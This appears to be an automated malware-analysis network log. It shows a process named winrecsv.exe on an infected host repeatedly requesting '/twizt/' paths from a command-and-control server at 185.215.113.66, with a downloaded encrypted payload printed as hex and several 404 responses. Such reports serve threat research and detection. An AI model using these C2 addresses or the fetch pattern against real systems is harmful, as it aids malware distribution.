                                                                                Aug 15, 2022 18:33:11.134000063 CEST8049859185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:33:11.134056091 CEST8049859185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:33:11.134139061 CEST4985980192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:33:12.150340080 CEST4985980192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:33:12.211819887 CEST8049859185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:33:12.211927891 CEST8049859185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:33:12.212024927 CEST4985980192.168.2.7185.215.113.66
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Aug 15, 2022 18:31:33.805222988 CEST5786140500192.168.2.7105.106.149.0
                                                                                Aug 15, 2022 18:31:38.840588093 CEST5786140500192.168.2.789.236.217.87
                                                                                • 185.215.113.66
                                                                                • 185.215.113.84
                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                0192.168.2.749762185.215.113.6680C:\Windows\winrecsv.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 15, 2022 18:31:30.836591005 CEST852OUTGET /twizt/1 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:30.893227100 CEST853INHTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:30 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 6912
                                                                                Last-Modified: Wed, 03 Aug 2022 19:43:49 GMT
                                                                                Connection: keep-alive
                                                                                ETag: "62eacff5-1b00"
                                                                                Accept-Ranges: bytes
                                                                                Data Raw: 99 48 11 ca 18 56 76 a4 f4 38 bd bc d2 0d bb d5 b1 61 b6 3d 7f 64 ff ce 05 55 f1 ed 72 63 6e 7b c8 dc 2c 03 c6 6d 13 4b e7 c2 db d2 45 cd ed 72 65 aa c4 db 89 6c e6 54 1b 00 9d ff 66 d3 57 23 07 d0 b5 b8 52 aa 70 40 33 12 92 0d 62 38 eb 6f aa ae ce eb bc a1 b4 6d 46 fb 3c 01 99 7b 8b 67 98 2f 64 81 5b 30 04 2f d9 0d f7 c8 2d fe 77 c2 1d 36 1a a4 e4 35 64 74 e6 0d 11 fd 27 b6 b0 53 20 63 50 09 4c 50 ce f2 7f fe ae f3 59 f0 10 3e 63 71 20 7d c3 20 ca 3d 6c 9b 68 6d 06 57 51 2c 8a 4f 44 97 29 1c 6b 16 72 49 f5 f6 f4 25 54 26 61 60 23 70 e8 37 c4 4c 86 a1 b6 70 8c 63 35 d9 fc f4 94 4f 6e 9d 90 4b c5 dd 05 76 67 89 e3 26 7b 96 78 74 6a ab 0f 00 af 87 af 91 3b 2b 15 0a 1a bf 13 12 92 7b 5d 2b 04 1f 8b 5d 31 9f 1c 0c 0c 50 a8 45 81 0f 1f 12 2e b3 ef 32 1d 4e c6 df a2 f5 88 47 a6 12 81 b1 05 5a 3e 5a 58 f0 9b 7d 33 5d a0 a6 6c a7 72 d5 c5 f0 58 06 19 af 10 34 3e ee 9d a1 75 64 26 b8 22 a9 4a 52 89 ee 94 6f 27 04 a5 23 7c 5c e7 93 f1 90 a9 37 8b 47 b2 51 24 d8 6a 91 28 49 e5 12 c9 d4 3e 2c 78 31 78 07 71 49 4c e2 36 0a 88 88 18 f4 51 dd 00 d1 e7 44 ca 80 cc e7 52 c0 96 4a 70 15 be 35 1f 36 f2 65 23 4f cf dc ea ec a0 fc 46 53 14 75 43 66 d9 b9 1b 4a 63 ba f1 54 cd 30 a0 34 cd a1 09 a0 4e 92 7d bf 86 1a 4f 8b 2c 1e db 51 86 11 32 1a e7 26 60 ce af 00 50 0d bc 0b 72 11 33 81 21 f7 c2 de a7 de 73 bc 4e 3c 72 48 62 a7 85 4c 30 5b 48 c2 1e d5 a4 dd 85 cc b0 fa 26 b4 3d 33 3f 42 b1 52 6f 1d d1 6b 0c a5 e3 75 3f 1f d8 ba 11 6c ff 3c 79 bb 35 22 8a c7 ac 81 b1 75 86 3e 29 38 2d d6 e3 ea 15 8d 89 5e 1c 16 63 10 4f 46 b4 9f c3 53 b4 53 59 44 e6 53 7d fa 9d 0c dc f1 b0 e5 94 e2 d6 dd 93 b2 85 f1 70 d6 af 5b a6 98 c2 ec 4d 0a 22 ec 8d 6c 02 82 2f fe 22 bc b5 b3 08 c8 78 b0 2e 49 d4 4a 6a 22 19 d7 0d c2 2c 52 29 e1 19 71 4a 93 bb 73 6d 50 b0 54 97 25 49 0e 6e 77 29 35 0e 92 27 a0 9b 87 e5 f7 7c 06 71 ca af 49 e3 77 c7 55 7a 3f dc 05 7f 71 d6 ba ab 16 55 59 fb db 43 96 94 33 7f 5a 9b 72 6b 17 8f 78 bf a2 fa c7 46 ee d9 47 d9 ca 8b 88 21 fa d0 75 98 86 45 0e bd cd c8 c9 9f 52 f9 cd 41 d1 73 c1 e1 60 2a 72 30 15 2b dc 35 a7 cd bb d1 f4 ab 87 78 a7 c0 ce 13 85 02 89 2d 06 e5 a6 88 6f da 6b f1 82 1d 3a 79 f0 72 a9 c2 25 37 4c dc d3 80 04 2e bc d8 ac 3e 77 29 43 1f 02 d7 10 9c 90 31 4e 75 50 5a da cc 2e 57 4e 3e 49 94 d0 c2 b3 8d 52 87 17 a2 d5 72 da ae 3b f0 dc f0 41 cd d1 0f 39 08 64 98 2f 74 78 15 9c 84 7b a7 e3 41 ee 52 db 25 e4 06 79 ae b7 f2 0f 5e cf 34 5e 78 00 fa fd f0 ba 98 a5 ef 11 aa 0a 14 71 07 ae d9 19 8e 07 12 80 c3 b1 1c 2e 24 2f cf eb 97 a1 3d 7b da 17 bc 1e b4 ad 7f ab 8d e3 e8 bf 33 ee 2e ee c1 36 2f f4 06 60 a5 7b 1e c0 07 13 fa 8f 9a 51 63 ed 1c 28 5c 1a 17 1f d0 2c c1 c7 7e 62 ae 2d 53 b3 9e 20 61 b4 14 40 f0 90 ec 22 10 67 3b 28 a1 ec 23 1e ad 63 c5 c5 b7 c2 fe 13 ba 1e f0 50 aa 15 3f dd c3 1e a6 15 7c 65 88 b7 54 f7 20 04 f6 1b 6e 7d 79 47 5d 5f 88 3a b1 67 d8 cc 7b f7 26 a6 70 67 12 9e 65 07 96 30 9d 03 7b 8d 59 16 50 9d 38 1b fb 65 33 9e a0 93 8d a7 21 b9 fb 68 58 b7 0f 71 d1 4c 4c ef 17 d5 ce 6a 51 5e c8 87 37 de 45 84 84 de 9c 3f 43 d6 b2 05 b4 2c 77 25 d6 b7 af aa 86 c3 e6 e4 c0 13 a6 f0 08 14 34 0b f4 3a e7 65 ca 59 32 cd 03 18 9d f0 47 c8 32 fb 44 48 71 3f 21 28 ed 2d ce 48 a5 e6 95 8a 37 f1 89 20 2d 74 01 70 d4 75 31 4f 50 a5 9d 99 46 6a be e6 65 8b c1 32 f9 fe
                                                                                Data Ascii: HVv8a=dUrcn{,mKErelTfW#Rp@3b8omF<{g/d[0/-w65dt'S cPLPY>cq } =lhmWQ,OD)krI%T&a`#p7Lpc5OnKvg&{xtj;+{]+]1PE.2NGZ>ZX}3]lrX4>ud&"JRo'#|\7GQ$j(I>,x1xqIL6QDRJp56e#OFSuCfJcT04N}O,Q2&`Pr3!sN<rHbL0[H&=3?BRoku?l<y5"u>)8-^cOFSSYDS}p[M"l/"x.IJj",R)qJsmPT%Inw)5'|qIwUz?qUYC3ZrkxFG!uERAs`*r0+5x-ok:yr%7L.>w)C1NuPZ.WN>IRr;A9d/tx{AR%y^4^xq.$/={3.6/`{Qc(\,~b-S a@"g;(#cP?|eT n}yG]_:g{&pge0{YP8e3!hXqLLjQ^7E?C,w%4:eY2G2DHq?!(-H7 -tpu1OPFje2
                                                                                Aug 15, 2022 18:31:30.893254995 CEST855INData Raw: 5d ba ee f2 26 70 38 40 98 3a bb 68 d0 9c aa de 65 09 92 78 d9 0d 07 6d f1 24 4c 2a 7b 7c ab 07 1f b9 8c 1f 61 e2 b8 1f 2a 6e 5b d1 d9 0a 45 4d 36 f7 24 f9 d2 94 07 04 f4 da 64 a3 87 43 12 55 ee 1f 7c 5a ca b0 19 b1 cb 15 dc fe 0f fe 4e 70 d8 e3
                                                                                Data Ascii: ]&p8@:hexm$L*{|a*n[EM6$dCU|ZNpZ|/tYOsg_*Hio93[Z%R,/k@%Dg'+[;_IFze-GHUAo9]`w28 ~lLPB|o;'XSVH
                                                                                Aug 15, 2022 18:31:30.893306971 CEST856INData Raw: 75 95 f6 40 89 ad e8 a3 0a 80 02 74 8d 77 b9 f8 0c 4e b5 9d 92 4b e5 fe ed c4 a5 89 1c d0 ca 24 e8 2f 4d 42 7c 5e a4 dd d6 2b b6 14 55 81 8b 8c 06 f1 6e 42 79 15 53 fe b6 e2 3f 65 e7 24 61 a9 45 43 f1 b9 d7 b7 02 c3 f1 0d 6a 4a d4 2f cc 2b 81 fa
                                                                                Data Ascii: u@twNK$/MB|^+UnByS?e$aECjJ/+Kv>H'Ur69z,M-BD#)0$=uFe,5%!;~~O<ff\w}Ts9Mn({hbV_?|s+oPf
                                                                                Aug 15, 2022 18:31:30.893336058 CEST857INData Raw: 19 41 c0 82 1e c2 12 92 56 ac d6 76 16 b1 01 76 22 2a 92 e6 50 b0 3a ef c0 31 11 ba 42 26 34 79 11 0f 9c b4 61 38 54 a9 6d fe e8 f2 c7 62 7c f5 bf 77 2a 2a 0b 04 05 a9 84 b4 1c d9 a8 4a 7a 26 ee e2 ba 2b 5f 16 af 3a c7 90 24 b7 8c 3d c3 c8 6c 50
                                                                                Data Ascii: AVvv"*P:1B&4ya8Tmb|w**Jz&+_:$=lPh[zzybBKI"h;Z"rX3iFA-<qAhI@+t>Ms1$E},s{e]|'BcT>0.FrpDydG
                                                                                Aug 15, 2022 18:31:30.893359900 CEST859INData Raw: 22 80 03 7b d8 10 5b 30 a7 51 0e c8 b4 43 fc e0 64 b9 34 aa 08 49 2a 8d 96 56 47 f2 aa fe 79 13 a8 81 8c 18 33 d0 89 98 ea c5 34 d1 78 86 dd 3a 86 3c 28 1d 9c eb 4a ef 9c af c2 5d 45 57 2f 47 83 c5 b0 46 ce cf 58 de df ac a9 89 ed 23 78 f9 54 63
                                                                                Data Ascii: "{[0QCd4I*VGy34x:<(J]EW/GFX#xTcORE3,<#9:`_Edm1exacG#.3IZOUHR<%zpQ6'[BGQwazOA ~uTl'HcKQLMKQL
                                                                                Aug 15, 2022 18:31:30.893424034 CEST859INData Raw: 9c 69 43 23 82 c6 fd 99 3e 6b d8 67 89 fc 51 f7 91 1c 7f 5e 51 33 b6 c9 a8 bc a7 67 83 a8 37 3e 19 18 05 17 41 0f e7 21 48 35 aa 03 5c 17 71 7e ae d2 18 3b 26 57 54 94 4e f0 05 c2 6c 9a 30 c3 ee 9c 9b 2f 68 78 5e 55 c4 f2 29 a0 1e 26 88 f8 f7 ce
                                                                                Data Ascii: iC#>kgQ^Q3g7>A!H5\q~;&WTNl0/hx^U)&Q/~K0D6P,/3na^z3P2M`={.fo?m0s]sW1&@vG'kS7z]%$DA9:x^N3#h#J/wsy{:jW1_y


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                1192.168.2.749763185.215.113.6680C:\Windows\winrecsv.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 15, 2022 18:31:31.247442961 CEST860OUTGET /twizt/1 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:31.304255009 CEST862INHTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:31 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 6912
                                                                                Last-Modified: Wed, 03 Aug 2022 19:43:49 GMT
                                                                                Connection: keep-alive
                                                                                ETag: "62eacff5-1b00"
                                                                                Accept-Ranges: bytes
                                                                                Data Raw: 99 48 11 ca 18 56 76 a4 f4 38 bd bc d2 0d bb d5 b1 61 b6 3d 7f 64 ff ce 05 55 f1 ed 72 63 6e 7b c8 dc 2c 03 c6 6d 13 4b e7 c2 db d2 45 cd ed 72 65 aa c4 db 89 6c e6 54 1b 00 9d ff 66 d3 57 23 07 d0 b5 b8 52 aa 70 40 33 12 92 0d 62 38 eb 6f aa ae ce eb bc a1 b4 6d 46 fb 3c 01 99 7b 8b 67 98 2f 64 81 5b 30 04 2f d9 0d f7 c8 2d fe 77 c2 1d 36 1a a4 e4 35 64 74 e6 0d 11 fd 27 b6 b0 53 20 63 50 09 4c 50 ce f2 7f fe ae f3 59 f0 10 3e 63 71 20 7d c3 20 ca 3d 6c 9b 68 6d 06 57 51 2c 8a 4f 44 97 29 1c 6b 16 72 49 f5 f6 f4 25 54 26 61 60 23 70 e8 37 c4 4c 86 a1 b6 70 8c 63 35 d9 fc f4 94 4f 6e 9d 90 4b c5 dd 05 76 67 89 e3 26 7b 96 78 74 6a ab 0f 00 af 87 af 91 3b 2b 15 0a 1a bf 13 12 92 7b 5d 2b 04 1f 8b 5d 31 9f 1c 0c 0c 50 a8 45 81 0f 1f 12 2e b3 ef 32 1d 4e c6 df a2 f5 88 47 a6 12 81 b1 05 5a 3e 5a 58 f0 9b 7d 33 5d a0 a6 6c a7 72 d5 c5 f0 58 06 19 af 10 34 3e ee 9d a1 75 64 26 b8 22 a9 4a 52 89 ee 94 6f 27 04 a5 23 7c 5c e7 93 f1 90 a9 37 8b 47 b2 51 24 d8 6a 91 28 49 e5 12 c9 d4 3e 2c 78 31 78 07 71 49 4c e2 36 0a 88 88 18 f4 51 dd 00 d1 e7 44 ca 80 cc e7 52 c0 96 4a 70 15 be 35 1f 36 f2 65 23 4f cf dc ea ec a0 fc 46 53 14 75 43 66 d9 b9 1b 4a 63 ba f1 54 cd 30 a0 34 cd a1 09 a0 4e 92 7d bf 86 1a 4f 8b 2c 1e db 51 86 11 32 1a e7 26 60 ce af 00 50 0d bc 0b 72 11 33 81 21 f7 c2 de a7 de 73 bc 4e 3c 72 48 62 a7 85 4c 30 5b 48 c2 1e d5 a4 dd 85 cc b0 fa 26 b4 3d 33 3f 42 b1 52 6f 1d d1 6b 0c a5 e3 75 3f 1f d8 ba 11 6c ff 3c 79 bb 35 22 8a c7 ac 81 b1 75 86 3e 29 38 2d d6 e3 ea 15 8d 89 5e 1c 16 63 10 4f 46 b4 9f c3 53 b4 53 59 44 e6 53 7d fa 9d 0c dc f1 b0 e5 94 e2 d6 dd 93 b2 85 f1 70 d6 af 5b a6 98 c2 ec 4d 0a 22 ec 8d 6c 02 82 2f fe 22 bc b5 b3 08 c8 78 b0 2e 49 d4 4a 6a 22 19 d7 0d c2 2c 52 29 e1 19 71 4a 93 bb 73 6d 50 b0 54 97 25 49 0e 6e 77 29 35 0e 92 27 a0 9b 87 e5 f7 7c 06 71 ca af 49 e3 77 c7 55 7a 3f dc 05 7f 71 d6 ba ab 16 55 59 fb db 43 96 94 33 7f 5a 9b 72 6b 17 8f 78 bf a2 fa c7 46 ee d9 47 d9 ca 8b 88 21 fa d0 75 98 86 45 0e bd cd c8 c9 9f 52 f9 cd 41 d1 73 c1 e1 60 2a 72 30 15 2b dc 35 a7 cd bb d1 f4 ab 87 78 a7 c0 ce 13 85 02 89 2d 06 e5 a6 88 6f da 6b f1 82 1d 3a 79 f0 72 a9 c2 25 37 4c dc d3 80 04 2e bc d8 ac 3e 77 29 43 1f 02 d7 10 9c 90 31 4e 75 50 5a da cc 2e 57 4e 3e 49 94 d0 c2 b3 8d 52 87 17 a2 d5 72 da ae 3b f0 dc f0 41 cd d1 0f 39 08 64 98 2f 74 78 15 9c 84 7b a7 e3 41 ee 52 db 25 e4 06 79 ae b7 f2 0f 5e cf 34 5e 78 00 fa fd f0 ba 98 a5 ef 11 aa 0a 14 71 07 ae d9 19 8e 07 12 80 c3 b1 1c 2e 24 2f cf eb 97 a1 3d 7b da 17 bc 1e b4 ad 7f ab 8d e3 e8 bf 33 ee 2e ee c1 36 2f f4 06 60 a5 7b 1e c0 07 13 fa 8f 9a 51 63 ed 1c 28 5c 1a 17 1f d0 2c c1 c7 7e 62 ae 2d 53 b3 9e 20 61 b4 14 40 f0 90 ec 22 10 67 3b 28 a1 ec 23 1e ad 63 c5 c5 b7 c2 fe 13 ba 1e f0 50 aa 15 3f dd c3 1e a6 15 7c 65 88 b7 54 f7 20 04 f6 1b 6e 7d 79 47 5d 5f 88 3a b1 67 d8 cc 7b f7 26 a6 70 67 12 9e 65 07 96 30 9d 03 7b 8d 59 16 50 9d 38 1b fb 65 33 9e a0 93 8d a7 21 b9 fb 68 58 b7 0f 71 d1 4c 4c ef 17 d5 ce 6a 51 5e c8 87 37 de 45 84 84 de 9c 3f 43 d6 b2 05 b4 2c 77 25 d6 b7 af aa 86 c3 e6 e4 c0 13 a6 f0 08 14 34 0b f4 3a e7 65 ca 59 32 cd 03 18 9d f0 47 c8 32 fb 44 48 71 3f 21 28 ed 2d ce 48 a5 e6 95 8a 37 f1 89 20 2d 74 01 70 d4 75 31 4f 50 a5 9d 99 46 6a be e6 65 8b c1 32 f9 fe
                                                                                Data Ascii: HVv8a=dUrcn{,mKErelTfW#Rp@3b8omF<{g/d[0/-w65dt'S cPLPY>cq } =lhmWQ,OD)krI%T&a`#p7Lpc5OnKvg&{xtj;+{]+]1PE.2NGZ>ZX}3]lrX4>ud&"JRo'#|\7GQ$j(I>,x1xqIL6QDRJp56e#OFSuCfJcT04N}O,Q2&`Pr3!sN<rHbL0[H&=3?BRoku?l<y5"u>)8-^cOFSSYDS}p[M"l/"x.IJj",R)qJsmPT%Inw)5'|qIwUz?qUYC3ZrkxFG!uERAs`*r0+5x-ok:yr%7L.>w)C1NuPZ.WN>IRr;A9d/tx{AR%y^4^xq.$/={3.6/`{Qc(\,~b-S a@"g;(#cP?|eT n}yG]_:g{&pge0{YP8e3!hXqLLjQ^7E?C,w%4:eY2G2DHq?!(-H7 -tpu1OPFje2
                                                                                Aug 15, 2022 18:31:31.304302931 CEST863INData Raw: 5d ba ee f2 26 70 38 40 98 3a bb 68 d0 9c aa de 65 09 92 78 d9 0d 07 6d f1 24 4c 2a 7b 7c ab 07 1f b9 8c 1f 61 e2 b8 1f 2a 6e 5b d1 d9 0a 45 4d 36 f7 24 f9 d2 94 07 04 f4 da 64 a3 87 43 12 55 ee 1f 7c 5a ca b0 19 b1 cb 15 dc fe 0f fe 4e 70 d8 e3
                                                                                Data Ascii: ]&p8@:hexm$L*{|a*n[EM6$dCU|ZNpZ|/tYOsg_*Hio93[Z%R,/k@%Dg'+[;_IFze-GHUAo9]`w28 ~lLPB|o;'XSVH
                                                                                Aug 15, 2022 18:31:31.304343939 CEST864INData Raw: 75 95 f6 40 89 ad e8 a3 0a 80 02 74 8d 77 b9 f8 0c 4e b5 9d 92 4b e5 fe ed c4 a5 89 1c d0 ca 24 e8 2f 4d 42 7c 5e a4 dd d6 2b b6 14 55 81 8b 8c 06 f1 6e 42 79 15 53 fe b6 e2 3f 65 e7 24 61 a9 45 43 f1 b9 d7 b7 02 c3 f1 0d 6a 4a d4 2f cc 2b 81 fa
                                                                                Data Ascii: u@twNK$/MB|^+UnByS?e$aECjJ/+Kv>H'Ur69z,M-BD#)0$=uFe,5%!;~~O<ff\w}Ts9Mn({hbV_?|s+oPf
                                                                                Aug 15, 2022 18:31:31.304390907 CEST866INData Raw: 19 41 c0 82 1e c2 12 92 56 ac d6 76 16 b1 01 76 22 2a 92 e6 50 b0 3a ef c0 31 11 ba 42 26 34 79 11 0f 9c b4 61 38 54 a9 6d fe e8 f2 c7 62 7c f5 bf 77 2a 2a 0b 04 05 a9 84 b4 1c d9 a8 4a 7a 26 ee e2 ba 2b 5f 16 af 3a c7 90 24 b7 8c 3d c3 c8 6c 50
                                                                                Data Ascii: AVvv"*P:1B&4ya8Tmb|w**Jz&+_:$=lPh[zzybBKI"h;Z"rX3iFA-<qAhI@+t>Ms1$E},s{e]|'BcT>0.FrpDydG
                                                                                Aug 15, 2022 18:31:31.304436922 CEST867INData Raw: 22 80 03 7b d8 10 5b 30 a7 51 0e c8 b4 43 fc e0 64 b9 34 aa 08 49 2a 8d 96 56 47 f2 aa fe 79 13 a8 81 8c 18 33 d0 89 98 ea c5 34 d1 78 86 dd 3a 86 3c 28 1d 9c eb 4a ef 9c af c2 5d 45 57 2f 47 83 c5 b0 46 ce cf 58 de df ac a9 89 ed 23 78 f9 54 63
                                                                                Data Ascii: "{[0QCd4I*VGy34x:<(J]EW/GFX#xTcORE3,<#9:`_Edm1exacG#.3IZOUHR<%zpQ6'[BGQwazOA ~uTl'HcKQLMKQL
                                                                                Aug 15, 2022 18:31:31.304474115 CEST868INData Raw: 9c 69 43 23 82 c6 fd 99 3e 6b d8 67 89 fc 51 f7 91 1c 7f 5e 51 33 b6 c9 a8 bc a7 67 83 a8 37 3e 19 18 05 17 41 0f e7 21 48 35 aa 03 5c 17 71 7e ae d2 18 3b 26 57 54 94 4e f0 05 c2 6c 9a 30 c3 ee 9c 9b 2f 68 78 5e 55 c4 f2 29 a0 1e 26 88 f8 f7 ce
                                                                                Data Ascii: iC#>kgQ^Q3g7>A!H5\q~;&WTNl0/hx^U)&Q/~K0D6P,/3na^z3P2M`={.fo?m0s]sW1&@vG'kS7z]%$DA9:x^N3#h#J/wsy{:jW1_y
                                                                                Aug 15, 2022 18:31:38.826719999 CEST870OUTGET /twizt/2 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:38.883768082 CEST871INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:38 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:31:39.898257017 CEST871OUTGET /twizt/3 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:39.955102921 CEST872INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:39 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:31:40.983021021 CEST872OUTGET /twizt/4 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:41.042918921 CEST873INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:41 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
